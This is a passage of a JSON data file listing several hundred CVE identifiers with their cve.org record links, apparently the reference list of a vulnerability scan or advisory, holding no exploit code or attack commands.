"url": "https://www.cve.org/CVERecord?id=CVE-2025-1352"
},
{
"name": "CVE-2024-43167",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43167"
},
{
"name": "CVE-2021-28861",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-28861"
},
{
"name": "CVE-2024-4741",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4741"
},
{
"name": "CVE-2022-21248",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21248"
},
{
"name": "CVE-2021-33574",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33574"
},
{
"name": "CVE-2018-1000035",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000035"
},
{
"name": "CVE-2021-40211",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-40211"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2024-58001",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58001"
},
{
"name": "CVE-2025-38393",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38393"
},
{
"name": "CVE-2024-26256",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26256"
},
{
"name": "CVE-2023-21930",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21930"
},
{
"name": "CVE-2019-18276",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-18276"
},
{
"name": "CVE-2025-38618",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38618"
},
{
"name": "CVE-2021-3326",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3326"
},
{
"name": "CVE-2023-2283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2283"
},
{
"name": "CVE-2020-0499",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-0499"
},
{
"name": "CVE-2025-8916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
},
{
"name": "CVE-2025-21724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21724"
},
{
"name": "CVE-2025-32414",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32414"
},
{
"name": "CVE-2025-8885",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8885"
},
{
"name": "CVE-2025-3136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3136"
},
{
"name": "CVE-2025-55160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55160"
},
{
"name": "CVE-2025-21891",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21891"
},
{
"name": "CVE-2025-38249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38249"
},
{
"name": "CVE-2023-40403",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40403"
},
{
"name": "CVE-2025-22013",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22013"
},
{
"name": "CVE-2024-50157",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50157"
},
{
"name": "CVE-2022-48703",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48703"
},
{
"name": "CVE-2025-38154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38154"
},
{
"name": "CVE-2022-1674",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1674"
},
{
"name": "CVE-2024-20918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20918"
},
{
"name": "CVE-2025-21858",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21858"
},
{
"name": "CVE-2025-41249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41249"
},
{
"name": "CVE-2022-30699",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30699"
},
{
"name": "CVE-2025-21672",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21672"
},
{
"name": "CVE-2025-38389",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38389"
},
{
"name": "CVE-2025-38448",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38448"
},
{
"name": "CVE-2022-48281",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48281"
},
{
"name": "CVE-2023-2426",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2426"
},
{
"name": "CVE-2021-35938",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35938"
},
{
"name": "CVE-2025-30704",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30704"
},
{
"name": "CVE-2021-35564",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35564"
},
{
"name": "CVE-2024-57949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57949"
},
{
"name": "CVE-2025-1632",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1632"
},
{
"name": "CVE-2021-20176",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20176"
},
{
"name": "CVE-2025-21979",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21979"
},
{
"name": "CVE-2022-3278",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3278"
},
{
"name": "CVE-2022-30580",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30580"
},
{
"name": "CVE-2025-21821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21821"
},
{
"name": "CVE-2022-28321",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28321"
},
{
"name": "CVE-2025-55298",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55298"
},
{
"name": "CVE-2022-43241",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43241"
},
{
"name": "CVE-2017-3606",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3606"
},
{
"name": "CVE-2023-52969",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52969"
},
{
"name": "CVE-2018-1000073",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000073"
},
{
"name": "CVE-2025-38052",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38052"
},
{
"name": "CVE-2025-38377",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38377"
},
{
"name": "CVE-2023-20883",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-20883"
},
{
"name": "CVE-2025-21733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21733"
},
{
"name": "CVE-2023-22656",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22656"
},
{
"name": "CVE-2025-46551",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46551"
},
{
"name": "CVE-2025-43965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43965"
},
{
"name": "CVE-2022-40090",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40090"
},
{
"name": "CVE-2021-36408",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36408"
},
{
"name": "CVE-2023-24329",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24329"
},
{
"name": "CVE-2025-21963",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21963"
},
{
"name": "CVE-2025-53045",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53045"
},
{
"name": "CVE-2023-39327",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39327"
},
{
"name": "CVE-2017-18253",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-18253"
},
{
"name": "CVE-2024-12243",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12243"
},
{
"name": "CVE-2024-26462",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26462"
},
{
"name": "CVE-2024-58053",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58053"
},
{
"name": "CVE-2025-38516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38516"
},
{
"name": "CVE-2025-30693",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30693"
},
{
"name": "CVE-2025-38462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38462"
},
{
"name": "CVE-2025-38350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38350"
},
{
"name": "CVE-2025-38428",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38428"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
},
{
"name": "CVE-2018-13410",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-13410"
},
{
"name": "CVE-2025-2099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2099"
},
{
"name": "CVE-2025-38262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38262"
},
{
"name": "CVE-2025-6638",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6638"
},
{
"name": "CVE-2025-21585",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21585"
},
{
"name": "CVE-2023-24531",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24531"
},
{
"name": "CVE-2025-38138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38138"
},
{
"name": "CVE-2021-3610",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3610"
},
{
"name": "CVE-2024-58077",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58077"
},
{
"name": "CVE-2025-5283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5283"
},
{
"name": "CVE-2025-21754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21754"
},
{
"name": "CVE-2024-12088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12088"
},
{
"name": "CVE-2023-24538",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24538"
},
{
"name": "CVE-2025-38035",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38035"
},
{
"name": "CVE-2023-2975",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2975"
},
{
"name": "CVE-2025-37997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37997"
},
{
"name": "CVE-2025-24928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24928"
},
{
"name": "CVE-2021-44717",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44717"
},
{
"name": "CVE-2025-2312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2312"
},
{
"name": "CVE-2025-0395",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0395"
},
{
"name": "CVE-2025-53506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53506"
},
{
"name": "CVE-2025-21960",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21960"
},
{
"name": "CVE-2025-38310",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38310"
},
{
"name": "CVE-2025-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23084"
},
{
"name": "CVE-2015-4786",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4786"
},
{
"name": "CVE-2020-14155",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14155"
},
{
"name": "CVE-2022-3602",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3602"
},
{
"name": "CVE-2025-37963",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37963"
},
{
"name": "CVE-2022-43250",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43250"
},
{
"name": "CVE-2022-40304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40304"
},
{
"name": "CVE-2025-38226",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38226"
},
{
"name": "CVE-2025-4947",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4947"
},
{
"name": "CVE-2023-4911",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4911"
},
{
"name": "CVE-2022-29804",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29804"
},
{
"name": "CVE-2023-38473",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38473"
},
{
"name": "CVE-2025-38443",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38443"
},
{
"name": "CVE-2025-0725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0725"
},
{
"name": "CVE-2023-2976",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2976"
},
{
"name": "CVE-2025-52099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52099"
},
{
"name": "CVE-2023-43887",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43887"
},
{
"name": "CVE-2025-21967",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21967"
},
{
"name": "CVE-2025-7424",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7424"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2021-24032",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-24032"
},
{
"name": "CVE-2025-38439",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38439"
},
{
"name": "CVE-2022-1434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1434"
},
{
"name": "CVE-2025-41254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41254"
},
{
"name": "CVE-2022-21496",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21496"
},
{
"name": "CVE-2022-41723",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41723"
},
{
"name": "CVE-2020-2757",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2757"
},
{
"name": "CVE-2025-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53864"
},
{
"name": "CVE-2025-38145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38145"
},
{
"name": "CVE-2022-2598",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2598"
},
{
"name": "CVE-2020-27829",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27829"
},
{
"name": "CVE-2024-4032",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4032"
},
{
"name": "CVE-2025-37948",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37948"
},
{
"name": "CVE-2021-27645",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-27645"
},
{
"name": "CVE-2025-21863",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21863"
},
{
"name": "CVE-2025-21856",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21856"
},
{
"name": "CVE-2025-53053",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53053"
},
{
"name": "CVE-2022-2509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2509"
},
{
"name": "CVE-2024-28835",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28835"
},
{
"name": "CVE-2025-54388",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54388"
},
{
"name": "CVE-2025-21749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21749"
},
{
"name": "CVE-2017-6839",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6839"
},
{
"name": "CVE-2023-1906",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1906"
},
{
"name": "CVE-2025-40025",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40025"
},
{
"name": "CVE-2025-38051",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38051"
},
{
"name": "CVE-2021-35556",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35556"
},
{
"name": "CVE-2025-49796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49796"
},
{
"name": "CVE-2022-34526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34526"
},
{
"name": "CVE-2025-8058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8058"
},
{
"name": "CVE-2023-47471",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47471"
},
{
"name": "CVE-2022-2868",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2868"
},
{
"name": "CVE-2022-1771",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1771"
},
{
"name": "CVE-2025-21945",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21945"
},
{
"name": "CVE-2021-32492",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32492"
},
{
"name": "CVE-2023-39323",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39323"
},
{
"name": "CVE-2023-29402",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29402"
},
{
"name": "CVE-2025-55005",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55005"
},
{
"name": "CVE-2025-32955",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32955"
},
{
"name": "CVE-2025-8732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8732"
},
{
"name": "CVE-2025-38044",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38044"
},
{
"name": "CVE-2022-1586",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1586"
},
{
"name": "CVE-2023-39326",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39326"
},
{
"name": "CVE-2024-52616",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52616"
},
{
"name": "CVE-2025-38498",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38498"
},
{
"name": "CVE-2025-40015",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40015"
},
{
"name": "CVE-2024-21085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21085"
},
{
"name": "CVE-2025-21673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21673"
},
{
"name": "CVE-2025-21829",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21829"
},
{
"name": "CVE-2025-21502",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21502"
},
{
"name": "CVE-2024-57999",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57999"
},
{
"name": "CVE-2018-16645",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-16645"
},
{
"name": "CVE-2025-22008",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22008"
},
{
"name": "CVE-2023-38039",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38039"
},
{
"name": "CVE-2023-29409",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29409"
},
{
"name": "CVE-2022-21443",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21443"
},
{
"name": "CVE-2025-21969",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21969"
},
{
"name": "CVE-2025-38200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38200"
},
{
"name": "CVE-2025-40007",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40007"
},
{
"name": "CVE-2024-58072",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58072"
},
{
"name": "CVE-2025-38273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38273"
},
{
"name": "CVE-2025-38346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38346"
},
{
"name": "CVE-2025-55315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55315"
},
{
"name": "CVE-2018-11813",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11813"
},
{
"name": "CVE-2025-21722",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21722"
},
{
"name": "CVE-2024-50379",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50379"
},
{
"name": "CVE-2021-35560",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35560"
},
{
"name": "CVE-2023-39325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39325"
},
{
"name": "CVE-2025-21793",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21793"
},
{
"name": "CVE-2022-2719",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2719"
},
{
"name": "CVE-2025-21581",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21581"
},
{
"name": "CVE-2022-45873",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45873"
},
{
"name": "CVE-2023-34151",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34151"
},
{
"name": "CVE-2023-51384",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51384"
},
{
"name": "CVE-2021-43809",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43809"
},
{
"name": "CVE-2025-5914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5914"
},
{
"name": "CVE-2015-1606",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-1606"
},
{
"name": "CVE-2025-21894",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21894"
},
{
"name": "CVE-2025-21919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21919"
},
{
"name": "CVE-2023-3896",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3896"
},
{
"name": "CVE-2023-2908",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2908"
},
{
"name": "CVE-2024-20945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20945"
},
{
"name": "CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"name": "CVE-2023-39615",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39615"
},
{
"name": "CVE-2023-24534",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24534"
},
{
"name": "CVE-2025-21854",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21854"
},
{
"name": "CVE-2017-7501",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7501"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2023-31486",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31486"
},
{
"name": "CVE-2020-21599",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-21599"
},
{
"name": "CVE-2025-41242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41242"
},
{
"name": "CVE-2024-21210",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21210"
},
{
"name": "CVE-2013-0340",
"url": "https://www.cve.org/CVERecord?id=CVE-2013-0340"
},
{
"name": "CVE-2023-3446",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3446"
},
{
"name": "CVE-2025-21759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21759"
},
{
"name": "CVE-2023-32611",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32611"
},
{
"name": "CVE-2024-38816",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38816"
},
{
"name": "CVE-2024-2511",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2511"
},
{
"name": "CVE-2015-20107",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-20107"
},
{
"name": "CVE-2023-39978",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39978"
},
{
"name": "CVE-2024-34397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34397"
},
{
"name": "CVE-2025-38320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38320"
},
{
"name": "CVE-2025-53057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53057"
},
{
"name": "CVE-2024-24786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24786"
},
{
"name": "CVE-2025-8177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8177"
},
{
"name": "CVE-2025-21968",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21968"
},
{
"name": "CVE-2024-58083",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58083"
},
{
"name": "CVE-2021-20311",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20311"
},
{
"name": "CVE-2024-58055",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58055"
},
{
"name": "CVE-2025-21991",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21991"
},
{
"name": "CVE-2023-28486",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28486"
},
{
"name": "CVE-2020-27618",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27618"
},
{
"name": "CVE-2024-57993",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57993"
},
{
"name": "CVE-2025-21887",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21887"
},
{
"name": "CVE-2023-6246",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6246"
},
{
"name": "CVE-2021-20241",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20241"
},
{
"name": "CVE-2017-12674",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-12674"
},
{
"name": "CVE-2023-0800",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0800"
},
{
"name": "CVE-2025-62171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62171"
},
{
"name": "CVE-2025-38280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38280"
},
{
"name": "CVE-2023-5388",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5388"
},
{
"name": "CVE-2018-1000078",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000078"
},
{
"name": "CVE-2020-2756",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2756"
},
{
"name": "CVE-2025-50950",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50950"
},
{
"name": "CVE-2020-21605",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-21605"
},
{
"name": "CVE-2024-54534",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54534"
},
{
"name": "CVE-2023-21967",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21967"
},
{
"name": "CVE-2025-38084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38084"
},
{
"name": "CVE-2024-34155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34155"
},
{
"name": "CVE-2022-23219",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23219"
},
{
"name": "CVE-2017-1000476",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-1000476"
},
{
"name": "CVE-2015-2640",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2640"
},
{
"name": "CVE-2025-30685",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30685"
},
{
"name": "CVE-2024-41123",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41123"
},
{
"name": "CVE-2025-6921",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6921"
},
{
"name": "CVE-2015-8863",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-8863"
},
{
"name": "CVE-2022-21619",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21619"
},
{
"name": "CVE-2025-30695",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30695"
},
{
"name": "CVE-2025-30688",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30688"
},
{
"name": "CVE-2023-5752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5752"
},
{
"name": "CVE-2018-11656",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11656"
},
{
"name": "CVE-2025-38103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38103"
},
{
"name": "CVE-2022-2127",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2127"
},
{
"name": "CVE-2021-25217",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-25217"
},
{
"name": "CVE-2025-38514",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38514"
},
{
"name": "CVE-2018-19876",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19876"
},
{
"name": "CVE-2025-61780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61780"
},
{
"name": "CVE-2021-20310",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20310"
},
{
"name": "CVE-2021-20245",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20245"
},
{
"name": "CVE-2021-35561",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35561"
},
{
"name": "CVE-2025-21732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21732"
},
{
"name": "CVE-2025-38569",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38569"
},
{
"name": "CVE-2022-21476",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21476"
},
{
"name": "CVE-2023-22796",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22796"
},
{
"name": "CVE-2025-21875",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21875"
},
{
"name": "CVE-2023-0361",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0361"
},
{
"name": "CVE-2025-38204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38204"
},
{
"name": "CVE-2021-40812",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-40812"
},
{
"name": "CVE-2021-4217",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4217"
},
{
"name": "CVE-2023-32643",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32643"
},
{
"name": "CVE-2023-27537",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27537"
},
{
"name": "CVE-2025-22015",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22015"
},
{
"name": "CVE-2025-53066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53066"
},
{
"name": "CVE-2023-5678",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5678"
},
{
"name": "CVE-2024-2961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2961"
},
{
"name": "CVE-2025-21962",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21962"
},
{
"name": "CVE-2025-29786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29786"
},
{
"name": "CVE-2025-21832",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21832"
},
{
"name": "CVE-2024-12133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12133"
},
{
"name": "CVE-2024-24784",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24784"
},
{
"name": "CVE-2022-27780",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27780"
},
{
"name": "CVE-2018-9135",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-9135"
},
{
